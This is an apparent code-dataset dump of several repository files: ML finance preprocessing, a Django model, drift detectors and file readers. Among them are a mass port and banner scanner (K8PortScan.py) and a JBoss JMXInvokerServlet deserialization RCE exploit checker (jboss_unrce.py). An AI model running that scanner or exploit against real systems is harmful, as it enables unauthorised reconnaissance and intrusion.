max_stars_repo_path
stringlengths
4
245
max_stars_repo_name
stringlengths
7
115
max_stars_count
int64
101
368k
id
stringlengths
2
8
content
stringlengths
6
1.03M
Chapter06/6B_TrendFollowings/6B_1_trendFollowing.py
uyenphuong18406/Hands-On-Artificial-Intelligence-for-Banking
115
12728009
#!/usr/bin/env python3 # -*- coding: utf-8 -*- QUANDLKEY = '<ENTER YOUR QUANDLKEY HERE>' """ Created on Thu Oct 25 23:19:44 2018 @author: jeff """ '''************************************* #1. Import libraries and key varable values ''' import quandl import plotly import plotly.graph_objs as go import numpy as np from datetime import datetime try: import Image except ImportError: from PIL import Image import os import h5py #dates parameters str_dte = '2003-01-01' end_dte = '2018-7-31' date_dict = {'gte':str_dte, 'lte':end_dte} #quandl setting quandl.ApiConfig.api_key = QUANDLKEY col_num_mid = 10 col_num_dte = 9 #parameters for the image generation pixel_size = 100 window_size = 60 pred_window_size = 1 num_channel = 1 #create path for the output dataset folder_path = os.path.dirname(__file__) data_X_dir = os.path.join(folder_path,'dataset') data_Y_dir = os.path.join(folder_path,'dataset') #ticker lists #tkr_list = ['TIPX','HYMB','TFI','ULST','MBG','FLRN','SHM','STOT','SPTS','BIL','SPSB'] tkr_list = ['DWX','TIPX','FLRN','CBND','SJNK','SRLN','CJNK','DWFI','EMTL','STOT','TOTL','DIA','SMEZ','XITK','GLDM','GLD','XKFS','XKII','XKST','GLDW','SYE','SYG','SYV','LOWC','ZCAN','XINA','EFAX','QEFA','EEMX','QEMM','ZDEU','ZHOK','ZJPN','ZGBR','QUS','QWLD','OOO','LGLV','ONEV','ONEO','ONEY','SPSM','SMLV','MMTM','VLU','SPY','SPYX','SPYD','SPYB','WDIV','XWEB','MDY','NANR','XTH','SHE','GAL','INKM','RLY','ULST','BIL','CWB','EBND','JNK','ITE','IBND','BWX','SPTL','MBG','BWZ','IPE','WIP','RWO','RWX','RWR','FEZ','DGT','XNTK','CWI','ACIM','TFI','SHM','HYMB','SPAB','SPDW','SPEM','SPIB','SPLG','SPLB','SPMD','SPSB','SPTS','SPTM','MDYG','MDYV','SPYG','SPYV','SLY','SLYG','SLYV','KBE','KCE','GII','KIE','KRE','XAR','XBI','GXC','SDY','GMF','EDIV','EWX','GNR','XHE','XHS','XHB','GWX','XME','XES','XOP','XPH','XRT','XSD','XSW','XTL','XTN','FEU','PSK'] #generate png file for each of the input or now img_output =False #generate interactive plot to the ticket stock price or not gen_plot = False '''************************************* #2. Define the function to rescale the stock price according to the min and max values ''' #input_X is a series of price #output_X is a series of price expressed in pixel def rescale(input_X, pixel, min_x,max_x): unit = (max_x - min_x)/pixel output_X = round((input_X-min_x)/unit,0) return output_X,unit '''************************************* #3. Go through the tickers ''' for tkr in tkr_list: print(tkr) #if the ticker has been downloaded, skip the ticket and go for the next one if os.path.exists(tkr+'6b1_completed.txt'): continue #download and create dataset df =quandl.get_table('SHARADAR/SFP',date=date_dict,ticker=tkr) #sort the date from ascending to descending... df = df.sort_values(by=['date']) df=df.reset_index(drop=True) #charting interactive chart for viewing the data if gen_plot == True: trace = go.Candlestick(x=df.date, open=df.open, high=df.high, low=df.low, close=df.close) data = [trace] plotly.offline.plot(data, filename=tkr+'simple_candlestick') #calculate mid price of the day df['mid'] = (df['high'] + df['low'])/2 len_df = len(df) num_img = max(int(len_df-window_size-1),0) current_min_dte = df.date train_shape = (num_img, pixel_size, window_size,num_channel) label_shape = (num_img, pixel_size) #remove the file if there is one data_X_path = os.path.join(data_X_dir,tkr+'X_img.h5') try: os.remove(data_X_path) except OSError: pass h5f_X = h5py.File(data_X_path,'w') #remove the file if there is one data_Y_path = os.path.join(data_Y_dir,tkr+'Y_label.h5') try: os.remove(data_Y_path) except OSError: pass h5f_Y = h5py.File(data_Y_path,'w') #create dataset within the HDF5 file #now we create the dataset with a fixed size to fit all the data, it could also be create to fit fixed batches h5f_X.create_dataset("X_img_ds", train_shape, np.float32) h5f_Y.create_dataset("Y_label_ds", label_shape, np.float32) #loop through the dates for i in range(num_img): img_ar = np.zeros((pixel_size,window_size,1)) result_Y =np.zeros((pixel_size)) df_plot = df.iloc[i:window_size+i,:] #create min and max values for the mid price plot within a given timeframe min_p = min(df_plot['mid']) max_p = max(df_plot['mid']) output_pixel,unit = rescale(df_plot['mid'],pixel_size,min_p,max_p) df_next = df.iloc[window_size+i+1,:] next_p = df_next['mid'] unit = max(unit,0.000001) next_p_val = max(round((min(next_p,max_p)-min_p)/unit,0),0) #in case of low liquidity ETF which has the same price, no graph be drawn if min_p ==max_p: continue k = 0 #draw the dot on the x, y axis of the input image array for pix in output_pixel: img_ar[int(pix)-1][k][0] = 255 k+=1 #output the image for visualization if img_output: img = Image.fromarray(img_ar) if img.mode != 'RGB': new_img = img.convert('RGB') file_path = os.path.join(folder_path,'img/'+tkr+str(i)+'.png') new_img.save(file_path,"PNG") img_row = img_ar/255 #draw the dot on the target image for training result_Y[int(next_p_val)-1] = 255 result_Y_row=result_Y/255 #stack up for a numpy for Image Recognition h5f_X["X_img_ds"][i, ...] = img_row h5f_Y["Y_label_ds"][i, ...] = result_Y_row if i == 0: np_X = img_row np_Y = result_Y_row else: np_X = np.vstack((np_X,img_row)) np_Y = np.vstack((np_Y,result_Y_row)) f_tkr=open(tkr+'6b1_completed.txt','w+') f_tkr.close() h5f_X.close() h5f_Y.close() #generate the message to the directory to signal the completion of this task f=open('6b1_completed.txt','w+') f.close()
example/books/models.py
spapas/django-generic-scaffold
106
12728048
from __future__ import unicode_literals try: from django.core.urlresolvers import reverse except ModuleNotFoundError: from django.urls import reverse from django.db import models import generic_scaffold class Book(models.Model): title = models.CharField(max_length=128) author = models.CharField(max_length=128) category = models.CharField(max_length=32) def get_absolute_url(self): return reverse(self.detail_url_name, args=[self.id]) def __str__(self): return '{0} {1} {2}'.format(self.title, self.author, self.category)
asterocr/text_rec/loss/__init__.py
ankur6ue/aster-ocr
605
12728061
from __future__ import absolute_import from .sequenceCrossEntropyLoss import SequenceCrossEntropyLoss __all__ = [ 'SequenceCrossEntropyLoss', ]
src/sage/crypto/mq/sbox.py
bopopescu/sage
1,742
12728063
<filename>src/sage/crypto/mq/sbox.py from sage.misc.lazy_import import lazy_import lazy_import('sage.crypto.sbox', ['SBox', 'feistel_construction', 'misty_construction'], deprecation=22986)
K8PortScan.py
VCStardust/K8tools
4,611
12728081
import socket, sys import threading import argparse import time ##Code: https://github.com/k8gege/K8PortScan ##K8portScan 1.0 ##Date: 20190530 ##Author: K8gege ##Usage: ##IP (IP IP/24 IP/16 IP/8) ## ##python K8PortScan.py -ip 172.16.17.32 ##python K8PortScan.py -ip 172.16.17.32 -p 80-89 ##python K8PortScan.py -ip 172.16.17.32/24 -p 80,445,3306 ## ##IPlist (ip.txt ip24.txt ip16.txt ip8.txt) ##python K8PortScan.py -f ip.txt ##python K8PortScan.py -f ip.txt -p 80-89 ##python K8PortScan.py -f ip24.txt -p 80,445,3306 def getPortBanner(ip, p): try: port=int(p) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if port==3306 or port==22 or port==23 or port==1521: s.settimeout(5) else: s.settimeout(0.2) s.connect((ip, port)) s.send('HELLO\r\n') #print ip+"\t"+p+" Open" print ip+"\t"+p+" Open\t"+s.recv(1024).split('\r\n')[0].strip('\r\n') except Exception as e: #print e pass finally: s.close() def GetPortsBanner(ip,ports): for p in ports: #print p banner=getPortBanner(ip,str(p)) # if banner!=None: # print ip+"\t"+banner def CscanPortBanner(ip,ports): if '/24' in ip: print 'ip/24: '+ip ipc = (ip.split('.')[:-1]) for i in range(1,256): ip = ('.'.join(ipc)+'.'+str(i)) threading._start_new_thread(GetPortsBanner,(ip,ports,)) time.sleep(0.1) else: GetPortsBanner(ip,ports) def BscanPortBanner(ip,ports): if '/16' in ip: print 'ip/16: '+ip ipc = (ip.split('.')[:-2]) for i in range(1,256): ip = ('.'.join(ipc)+'.'+str(i)+'.0/24') CscanPortBanner(ip,ports) def AscanPortBanner(ip,ports): if '/8' in ip: print 'ip/8: '+ip ipc = (ip.split('.')[:-3]) for i in range(1,256): ip = ('.'.join(ipc)+'.'+str(i)+'.0/16') BscanPortBanner(ip,ports) if __name__ == '__main__': print('K8PortScan 1.0') parser = argparse.ArgumentParser() parser.add_argument('-ip',help='IP or IP/24') parser.add_argument('-f', dest="ip_file", help="ip.txt ip24.txt ip16.txt ip8.txt") parser.add_argument('-p', dest='port', type=str, help="Example: 80 80-89 80,443,3306,8080") args = parser.parse_args() ip=args.ip tmpPorts = args.port ipfile=args.ip_file if ip==None and ipfile==None: print 'Error: ip or ipfile is Null!' print 'Help: -h or --help' sys.exit(1) if tmpPorts: if ',' in tmpPorts: ports = tmpPorts.split(',') elif '-' in tmpPorts: ports = tmpPorts.split('-') tmpports = [] [tmpports.append(i) for i in range(int(ports[0]), int(ports[1]) + 1)] ports = tmpports else: ports = [tmpPorts] else: print 'Default Ports' ports = [21, 22, 23, 53, 80, 111, 139, 161, 389, 443, 445, 512, 513, 514, 873, 1025, 1433, 1521, 3128, 3306, 3311, 3312, 3389, 5432, 5900, 5984, 6082, 6379, 7001, 7002, 8000, 8080, 8081, 8090, 9000, 9090, 8888, 9200, 9300, 10000, 11211, 27017, 27018, 50000, 50030, 50070] if ipfile!=None: iplist = [] with open(str(ipfile)) as f: while True: line = str(f.readline()).strip() if line: iplist.append(line) else: break if ipfile=='ip24.txt': print 'Scan iplist/24' for ip in iplist: CscanPortBanner(ip+'/24',ports) elif ipfile=='ip16.txt': print 'Scan iplist/16' for ip in iplist: BscanPortBanner(ip+'/16',ports) elif ipfile=='ip8.txt': print 'Scan iplist/8' for ip in iplist: AscanPortBanner(ip+'/8',ports) # elif ipfile=='ip.txt': # print 'iplist' else: print 'Scan iplist (any txt file)' for ip in iplist: CscanPortBanner(ip,ports) elif ip!=None: if '/16' in ip: BscanPortBanner(ip,ports) elif '/8' in ip: AscanPortBanner(ip,ports) elif '/24' in ip: CscanPortBanner(ip,ports) else: CscanPortBanner(ip,ports)
middileware/jboss/jboss_unrce.py
xin053/PocCollect
340
12728107
<filename>middileware/jboss/jboss_unrce.py #coding:utf-8 import urllib2 import binascii import time from t import T def readfile(path): data=None file_object = open(path,'rb') try: data = file_object.read( ) finally: file_object.close( ) return data class P(T): def __init__(self): T.__init__(self) def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): timeout=3 target_url = 'http://'+ip+':'+port result = {} result['result']=False res=None vul_url = target_url+"/invoker/JMXInvokerServlet" import os upload_jar = readfile(os.path.split(os.path.realpath(__file__))[0]+'/upload.jar') vul_test=readfile(os.path.split(os.path.realpath(__file__))[0]+'/vultest.dat') try: urllib2.urlopen(vul_url,upload_jar) res = urllib2.urlopen(vul_url,vul_test) if 'vultest11111' in res.read(): info= vul_url +" Jboss Unserialization vul" result['result']=True result['VerifyInfo'] = {} result['VerifyInfo']['type']='Jboss Unserialization vul' result['VerifyInfo']['URL'] =target_url result['VerifyInfo']['payload']=vul_url result['VerifyInfo']['result'] =info return result except Exception,e: return result finally: if res is not None: res.close() del upload_jar del vul_test if __name__ == '__main__': print P().verify(ip='172.16.58.3',port='8080')
torchdrift/detectors/partial_mmd.py
TorchDrift/TorchDrift
200
12728129
<gh_stars>100-1000 from typing import Optional import torch from .mmd import GaussianKernel from .detector import Detector import torchdrift import warnings def partial_kernel_mmd_twostage(x, y, n_perm=None, kernel=GaussianKernel(), fraction_to_match=1.0, wasserstein_p=2.0): """Partial kernel MMD using a Wasserstein coupling to obtain the weight for the reference. """ torchdrift.utils.check( n_perm is None, "Bootstrapping within partial MMD is not implemented, use bootstrap during fit", error_class=NotImplementedError ) n, d = x.shape m, d2 = y.shape if fraction_to_match < 1.0: _, coupling = torchdrift.detectors.wasserstein( x, y, fraction_to_match=fraction_to_match, return_coupling=True, n_perm=None, p=wasserstein_p) w = coupling[:, :-1].sum(1).to(device=x.device, dtype=x.dtype) / fraction_to_match else: w = torch.full((n,), 1.0 / n, device=x.device, dtype=x.dtype) torchdrift.utils.check(d == d2, "feature dimension mismatch") xy = torch.cat([x.detach(), y.detach()], dim=0) dists = torch.cdist(xy, xy, p=2.0) # we are a bit sloppy here as we just keep the diagonal and everything twice k = kernel(dists) k_x = k[:n, :n] k_y = k[n:, n:] k_xy = k[:n, n:] # The diagonals are always 1 (up to numerical error, this is (3) in Gretton et al.) mmd = (w @ k_x) @ w + k_y.sum() / (m * m) - 2 * (w @ k_xy).sum() / m return mmd def partial_kernel_mmd_qp(x, y, n_perm=None, kernel=GaussianKernel(), fraction_to_match=1.0): """Partial Kernel MMD using quadratic programming. This is very slow and mainly intended for reference purposes. You need to install qpsolvers to use this function.""" torchdrift.utils.check( n_perm is None, "Bootstrapping within partial MMD is not implemented, use bootstrap during fit", error_class=NotImplementedError ) import qpsolvers n, d = x.shape m, d2 = y.shape torchdrift.utils.check(d == d2, "feature dimension mismatch") xy = torch.cat([x.detach(), y.detach()], dim=0) dists = torch.cdist(xy, xy, p=2.0) # we are a bit sloppy here as we just keep the diagonal and everything twice k = kernel(dists.double()) k_x = k[:n, :n] k_y = k[n:, n:] k_xy = k[:n, n:] v = torch.full((m,), 1 / m, dtype=k_y.dtype, device=k_y.device) R = torch.cholesky(k_x, upper=True) d = torch.inverse(R.t()) @ (k_xy.sum(1) / m) lb = torch.zeros((n,), dtype=k_x.dtype, device=k_x.device) ub = torch.full((n,), 1.0 / (n * fraction_to_match), dtype=k_x.dtype, device=k_x.device) w = qpsolvers.solve_ls(R.cpu().numpy(), d.cpu().numpy(), lb=lb.cpu().numpy(), ub=ub.cpu().numpy(), A=torch.ones((1, n,), dtype=R.dtype).numpy(), b=torch.ones((1,), dtype=R.dtype).numpy()) torchdrift.utils.check( w is not None, 'QP failed to find a solution (numerical accuracy with the bounds?)' ) w = torch.as_tensor(w, device=k_x.device, dtype=k_x.dtype) mmd = (w @ k_x) @ w + k_y.sum() / (m * m) - 2 * (w @ k_xy).sum() / m return mmd def partial_kernel_mmd_approx( x, y, fraction_to_match=1.0, kernel=GaussianKernel(), n_perm=None): torchdrift.utils.check( n_perm is None, "Bootstrapping within partial MMD is not implemented, use bootstrap during fit", error_class=NotImplementedError ) rng = torch.Generator(device=x.device).manual_seed(1234) n, d = x.shape m, d2 = y.shape torchdrift.utils.check(d == d2, "feature dimension mismatch") xy = torch.cat([x.detach(), y.detach()], dim=0) dists = torch.cdist(xy, xy, p=2.0) k = kernel(dists.double()) k_x = k[:n, :n] k_y = k[n:, n:] k_xy = k[:n, n:] w = torch.full((n,), 1.0 / n, dtype=k_x.dtype, device=k_x.device, requires_grad=False) mmd = (w @ k_x) @ w + k_y.sum() / (m * m) - 2 * (w @ k_xy).sum() / m for i in range(100): r = torch.rand((), device=x.device, dtype=x.dtype, generator=rng) + 0.5 grad_mmd = (k_x @ w) - (k_xy).mean(1) grad_mmd_min = grad_mmd[(w < 1.0 / (n * fraction_to_match))] if grad_mmd_min.size(0) > 0: grad_mmd_min = grad_mmd_min.min() else: grad_mmd_min = torch.zeros_like(r) grad_mmd_max = grad_mmd[(w > 0)] if grad_mmd_max.size(0) > 0: grad_mmd_max = grad_mmd_max.max() else: # pragma: no cover grad_mmd_max = torch.zeros_like(r) active_mask = (((w > 0) | (grad_mmd < grad_mmd_min * r)) & ((w < 1.0 / (n * fraction_to_match)) | (grad_mmd > grad_mmd_max * r))) H_mmd_active = k_x[active_mask][:, active_mask] if H_mmd_active.size(0) == 0: continue u = torch.cholesky(H_mmd_active) Hinvgr = torch.cholesky_solve(grad_mmd[active_mask][:, None], u).squeeze(1) w_active = w[active_mask] Hinvgr -= Hinvgr.mean() Hinvgr_full = torch.zeros_like(w) Hinvgr_full[active_mask] = Hinvgr step = 1.0 for j in range(5): w_cand = w.clone() w_cand -= step * Hinvgr_full w_cand.clamp_(min=0, max=1.0 / (n * fraction_to_match)) w_cand /= w_cand.sum() mmd_cand = (w_cand @ k_x) @ w_cand + k_y.sum() / (m * m) - 2 * (w_cand @ k_xy).sum() / m is_lower = (mmd_cand < mmd) mmd = torch.where(is_lower, mmd_cand, mmd) w = torch.where(is_lower, w_cand, w) step /= 5 grad_mmd = 2 * (k_x @ w) - 2 * (k_xy).mean(1) grad_mmd_min = grad_mmd[(w < 1.0 / (n * fraction_to_match))] if grad_mmd_min.size(0) > 0: grad_mmd_min = grad_mmd_min.min() else: grad_mmd_min = torch.zeros_like(r) grad_mmd_max = grad_mmd[(w > 0)] if grad_mmd_max.size(0) > 0: grad_mmd_max = grad_mmd_max.max() else: # pragma: no cover grad_mmd_max = torch.zeros_like(r) active_mask = (((w > 0) | (grad_mmd < grad_mmd_min * r)) & ((w < 1.0 / (n * fraction_to_match)) | (grad_mmd > grad_mmd_max * r))) step = 1e-1 for j in range(5): w_candnd = w.clone() grad_mmd_x = grad_mmd.clone() grad_mmd_x = torch.where(active_mask, grad_mmd_x, torch.zeros((), device=grad_mmd_x.device, dtype=grad_mmd_x.dtype)) grad_mmd_x = torch.where(active_mask, grad_mmd_x, grad_mmd_x - grad_mmd_x.mean()) w_cand -= step * grad_mmd_x w_cand.clamp_(min=0, max=1.0 / (n * fraction_to_match)) w_cand /= w_cand.sum() mmd_cand = (w_cand @ k_x) @ w_cand + k_y.sum() / (m * m) - 2 * (w_cand @ k_xy).sum() / m is_lower = (mmd_cand < mmd) mmd = torch.where(is_lower, mmd_cand, mmd) w = torch.where(is_lower, w_cand, w) step = step / 5 return mmd class PartialKernelMMDDriftDetector(Detector): """Drift detector based on the partial MMD Distance. (see <NAME>: Partial Wasserstein and Maximum Mean Discrepancy distances for bridging the gap between outlier detection and drift detection, https://arxiv.org/abs/2106.01289 ) Note: We recommend using dtype double as input for now. Args: fraction_to_match: fraction of x probability mass to be matched n_perm: number of bootstrap permutations to run to compute p-value (None for not returning a p-value) method: PartialKernelMMDDriftDetector.METHOD_TWOSTAGE, METHOD_APPROX, or METHOD_QP """ METHOD_TWOSTAGE = 1 METHOD_APPROX = 2 METHOD_QP = 3 def __init__( self, *, return_p_value=False, n_perm=1000, fraction_to_match=1.0, kernel=GaussianKernel(), method=METHOD_TWOSTAGE, ): super().__init__(return_p_value=return_p_value) self.fraction_to_match = fraction_to_match self.kernel = kernel self.n_perm = n_perm self.n_test = None self.scores = None if method == PartialKernelMMDDriftDetector.METHOD_TWOSTAGE: self.partial_mmd = partial_kernel_mmd_twostage elif method == PartialKernelMMDDriftDetector.METHOD_APPROX: self.partial_mmd = partial_kernel_mmd_approx elif method == PartialKernelMMDDriftDetector.METHOD_QP: self.partial_mmd = partial_kernel_mmd_qp else: # pragma: no cover raise RuntimeError("Invalid Partial MMD method") def fit(self, x: torch.Tensor, n_test: Optional[int] = None): """Record a sample as the reference distribution Args: x: The reference data n_test: If an int is specified, the last n_test datapoints will not be considered part of the reference data. Instead, bootstrappin using permutations will be used to determine the distribution under the null hypothesis at fit time. Future testing must then always be done with n_test elements to get p-values. """ x = x.detach() if n_test is None: self.base_outputs = x else: torchdrift.utils.check(0 < n_test < x.size(0), "n_test must be strictly between 0 and the number of samples") self.n_test = n_test self.base_outputs = x[:-n_test] n_ref = x.size(0) - n_test with_distant_point = self.fraction_to_match < 1.0 scores = [] for i in range(self.n_perm): slicing = torch.randperm(x.size(0)) scores.append(self.partial_mmd(x[slicing[:-n_test]], x[slicing[-n_test:]], fraction_to_match=self.fraction_to_match, kernel=self.kernel)) scores = torch.stack(scores) self.scores = scores self.dist_min = scores.min().double() mean = scores.mean() - self.dist_min var = scores.var().double() self.dist_alpha = mean**2 / var self.dist_beta = mean / var self.scores = scores return x def predict_shift_from_features( self, base_outputs: torch.Tensor, outputs: torch.Tensor, compute_score: bool, compute_p_value: bool, individual_samples: bool = False, ): torchdrift.utils.check( not individual_samples, "Individual samples not supported by Wasserstein distance detector" ) if not compute_p_value: ood_score = self.partial_mmd( base_outputs, outputs, fraction_to_match=self.fraction_to_match, n_perm=None, ) p_value = None else: torchdrift.utils.check( self.n_test is not None, "Bootstrapping within partial MMD is not implemented, use bootstrap during fit", error_class=NotImplementedError ) torchdrift.utils.check(self.n_test == outputs.size(0), "number of test samples does not match calibrated number") ood_score = self.partial_mmd( base_outputs, outputs, fraction_to_match=self.fraction_to_match, n_perm=None) p_value = torch.igammac(self.dist_alpha, self.dist_beta * (ood_score - self.dist_min).clamp_(min=0)) # needs PyTorch >=1.8 # z = (ood_score - self.dist_mean) / self.dist_std # p_value = 0.5 * torch.erfc(z * (0.5**0.5)) # p_value = (self.scores > ood_score).float().mean() return ood_score, p_value
plotdevice/util/readers.py
plotdevice/plotdevice
110
12728133
<filename>plotdevice/util/readers.py # encoding: utf-8 import os, sys, re from operator import attrgetter PY2 = sys.version_info[0] == 2 # files & io from io import open, StringIO, BytesIO from os.path import abspath, dirname, exists, join, splitext from plotdevice import DeviceError, INTERNAL text_type = str if not PY2 else unicode # data formats import json, csv from collections import namedtuple, defaultdict from codecs import iterencode, iterdecode from xml.parsers import expat # http from urlparse import urlparse from Foundation import NSDateFormatter, NSLocale, NSTimeZone, NSDate ### XML handling ### Element = namedtuple('Element', ['tag', 'attrs', 'parents', 'start', 'end']) escapes = [('break','0C'), ('indent', '09'), ('flush', '08')] doctype = '<!DOCTYPE plod [ %s ]>' % "".join(['<!ENTITY %s "&#xE0%s;" >'%e for e in escapes]) HEAD = u"%s<%s>" % (doctype, INTERNAL) TAIL = u"</%s>" % INTERNAL class XMLParser(object): _log = 0 def __init__(self, txt, offset=0): # configure the parsing machinery/callbacks p = expat.ParserCreate() p.StartElementHandler = self._enter p.EndElementHandler = self._leave p.CharacterDataHandler = self._chars self._expat = p # shift the range values in .nodes by offset (in case we're appending) self._offset = offset # set up state attrs to record the parse results self.stack = [] self.cursor = offset self.regions = defaultdict(list) self.nodes = defaultdict(list) self.body = [] # wrap everything in a root node (and include the whitespace entities which shift # the tty escapes into the unicode PUA for the duration) if isinstance(txt, text_type): txt = txt.encode('utf-8') self._xml = HEAD.encode('utf-8') + txt + TAIL.encode('utf-8') # parse the input xml string try: self._expat.Parse(self._xml, True) except expat.ExpatError, e: self._expat_error(e) @property def text(self): # returns the processed string (with all markup removed and tty-escapes un-shifted) return u"".join(self.body).translate({0xE000+v:v for v in (8,9,12)}) def _expat_error(self, e): # correct the column and line-string for our wrapper element col = e.offset err = u"\n".join(e.args) line = self._xml.decode('utf-8').split("\n")[e.lineno-1] if line.startswith(HEAD): line = line[len(HEAD):] col -= len(HEAD) err = re.sub(ur'column \d+', 'column %i'%col, err) if line.endswith(TAIL): line = line[:-len(TAIL)] # move the column range with the typo into `measure` chars measure = 80 snippet = line if col>measure: snippet = snippet[col-measure:] col -= col-measure snippet = snippet[:max(col+12, measure-col)] col = min(col, len(snippet)) # show which ends of the line are truncated clipped = [snippet] if not line.endswith(snippet): clipped.append(u'...') if not line.startswith(snippet): clipped.insert(0, u'...') col+=3 caret = u' '*(col-1) + u'^' # raise the exception msg = u'Text: ' + err stack = u'stack: ' + u" ".join(['<%s>'%elt.tag for elt in self.stack[1:]]) + u' ...' xmlfail = u"\n".join([msg, u"".join(clipped), caret, stack]) raise DeviceError(xmlfail) def log(self, s=None, indent=0): if not isinstance(s, basestring): if s is None: return self._log self._log = int(s) return if not self._log: return if indent<0: self._log-=1 msg = (u' '*self._log)+(s if s.startswith('<') else repr(s)[1:]) print msg.encode('utf-8') if indent>0: self._log+=1 def _enter(self, name, attrs): parents = tuple(reversed([e.tag for e in self.stack[1:]])) elt = Element(name, attrs, parents, self.cursor, end=None) self.stack.append(elt) self.log(u'<%s>'%(name), indent=1) def _chars(self, data): selector = tuple([e.tag for e in self.stack]) # handle special case where a self-closed tag precedes a '\n' if hasattr(self, '_crlf'): if data == "\n": selector = selector + (self._crlf.tag,) del self._crlf self.regions[selector].append(tuple([self.cursor-self._offset, len(data)])) self.cursor += len(data) self.body.append(data) self.log(data) def _leave(self, name): node = self.stack.pop()._replace(end=self.cursor) # hang onto line-ending self-closed tags so they can be applied to the next '\n' in _chars if node.start==node.end: at = self._expat.CurrentByteIndex if self._xml[at-2:at]=='/>' and self._xml[at:at+1]=="\n": node = node._replace(end=node.start+1) self._crlf = node self.nodes[name].append(node) self.log(u'</%s>'%(name), indent=-1) # if we've exited the root node, clean up the parsed elements if name == INTERNAL: del self.nodes[INTERNAL] self.nodes = {tag:sorted(elts, key=attrgetter('start')) for tag,elts in self.nodes.items()} ### CSV unpacking ### def csv_rows(file_obj, dialect=csv.excel, **kwargs): csvfile = iterencode(file_obj, 'utf-8') if PY2 else file_obj csvreader = csv.reader(csvfile, dialect=dialect, **kwargs) csvreader = (list(iterdecode(i, 'utf-8')) for i in csvreader) if PY2 else csvreader for row in csvreader: yield row def csv_dict(file_obj, dialect=csv.excel, cols=None, dict=dict, **kwargs): if not isinstance(cols, (list, tuple)): cols=None for row in csv_rows(file_obj, dialect, **kwargs): if not cols: cols = row continue yield dict(zip(cols,row)) def csv_tuple(file_obj, dialect=csv.excel, cols=None, **kwargs): if not isinstance(cols, (list, tuple)): cols=None elif cols: RowType = namedtuple('Row', cols) for row in csv_rows(file_obj, dialect, **kwargs): if not cols: cols = row RowType = namedtuple('Row', cols) continue yield RowType(**dict(zip(cols, row))) def csv_dialect(fd): snippet = fd.read(1024).encode('utf-8') if PY2 else fd.read(1024) fd.seek(0) return csv.Sniffer().sniff(snippet) ### HTTP utils ### try: import requests from cachecontrol import CacheControl, CacheControlAdapter from cachecontrol.caches import FileCache from cachecontrol.heuristics import LastModified cache_dir = '%s/Library/Caches/PlotDevice'%os.environ['HOME'] HTTP = CacheControl(requests.Session(), cache=FileCache(cache_dir), heuristic=LastModified()) except ImportError: class Decoy(object): def get(self, url): unsupported = 'could not find the "requests" library (try running "python setup.py build" first)' raise RuntimeError(unsupported) HTTP = Decoy() def binaryish(content, format): bin_types = ('pdf','eps','png','jpg','jpeg','gif','tiff','tif','zip','tar','gz') bin_formats = ('raw','bytes','img','image') if any(b in content for b in bin_types): return True if format: return any(b in format for b in bin_types+bin_formats) return False _nsdf = NSDateFormatter.alloc().init() _nsdf.setLocale_(NSLocale.alloc().initWithLocaleIdentifier_("en_US_POSIX")) _nsdf.setDateFormat_("EEE',' dd' 'MMM' 'yyyy HH':'mm':'ss zzz") _nsdf.setTimeZone_(NSTimeZone.timeZoneForSecondsFromGMT_(0)) def last_modified(resp): """Return the last modified date as a unix time_t""" last_mod = _nsdf.dateFromString_(resp.headers.get('Last-Modified')) if not last_mod: last_mod = NSDate.date() return last_mod.timeIntervalSince1970() ### File/URL Reader ### def read(pth, format=None, encoding=None, cols=None, **kwargs): """Returns the contents of a file into a string or format-dependent data type (with special handling for json and csv files). The format will either be inferred from the file extension or can be set explicitly using the `format` arg. Text will be read using the specified `encoding` or default to UTF-8. JSON files will be parsed and an appropriate python type will be selected based on the top-level object defined in the file. The optional keyword argument `dict` can be set to `adict` or `odict` if you'd prefer not to use the standard python dictionary for decoded objects. CSV files will return a list of rows. By default each row will be an ordered list of column values. If the first line of the file defines column names, you can call read() with cols=True in which case each row will be a namedtuple using those names as keys. If the file doesn't define its own column names, you can pass a list of strings as the `cols` parameter. Rows can be formatted as column-keyed dictionaries by passing True as the `dict` parameter. """ if re.match(r'https?:', pth): resp = HTTP.get(pth) resp.raise_for_status() extension_type = splitext(urlparse(pth).path)[-1] content_type = resp.headers.get('content-type', extension_type).lower() for data_t in ['json', 'csv']: if data_t in content_type: extension_type = data_t if binaryish(content_type, format): fd = BytesIO(resp.content) else: if encoding: resp.encoding = encoding elif 'charset' not in content_type: resp.encoding = resp.apparent_encoding fd = StringIO(resp.text) else: enc = encoding or 'utf-8' extension_type = splitext(pth)[-1].lower() if binaryish(extension_type, format): fd = open(os.path.expanduser(pth), 'rb') else: fd = open(os.path.expanduser(pth), 'rt', encoding=enc) if kwargs.get('dict') is True: kwargs['dict'] = dict elif kwargs.get('dict') is False: del kwargs['dict'] dict_type = kwargs.get('dict', dict) format = (format or extension_type).lstrip('.') if format=='json': return json.load(fd, object_pairs_hook=dict_type) elif format=='csv': dialect = csv_dialect(fd) if cols: if kwargs.get('dict'): return list(csv_dict(fd, dialect=dialect, cols=cols, dict=dict_type)) else: return list(csv_tuple(fd, dialect=dialect, cols=cols)) return list(csv_rows(fd, dialect=dialect)) else: return fd.read()
tests/build_small_spatialite_db.py
eyeseast/datasette
5,978
12728169
<reponame>eyeseast/datasette<filename>tests/build_small_spatialite_db.py import sqlite3 # This script generates the spatialite.db file in our tests directory. def generate_it(filename): conn = sqlite3.connect(filename) # Lead the spatialite extension: conn.enable_load_extension(True) conn.load_extension("/usr/local/lib/mod_spatialite.dylib") conn.execute("select InitSpatialMetadata(1)") conn.executescript("create table museums (name text)") conn.execute("SELECT AddGeometryColumn('museums', 'point_geom', 4326, 'POINT', 2);") # At this point it is around 5MB - we can shrink it dramatically by doing thisO conn.execute("delete from spatial_ref_sys") conn.execute("delete from spatial_ref_sys_aux") conn.commit() conn.execute("vacuum") conn.close() if __name__ == "__main__": generate_it("spatialite.db")
extra_tests/snippets/unicode_slicing.py
dbrgn/RustPython
11,058
12728187
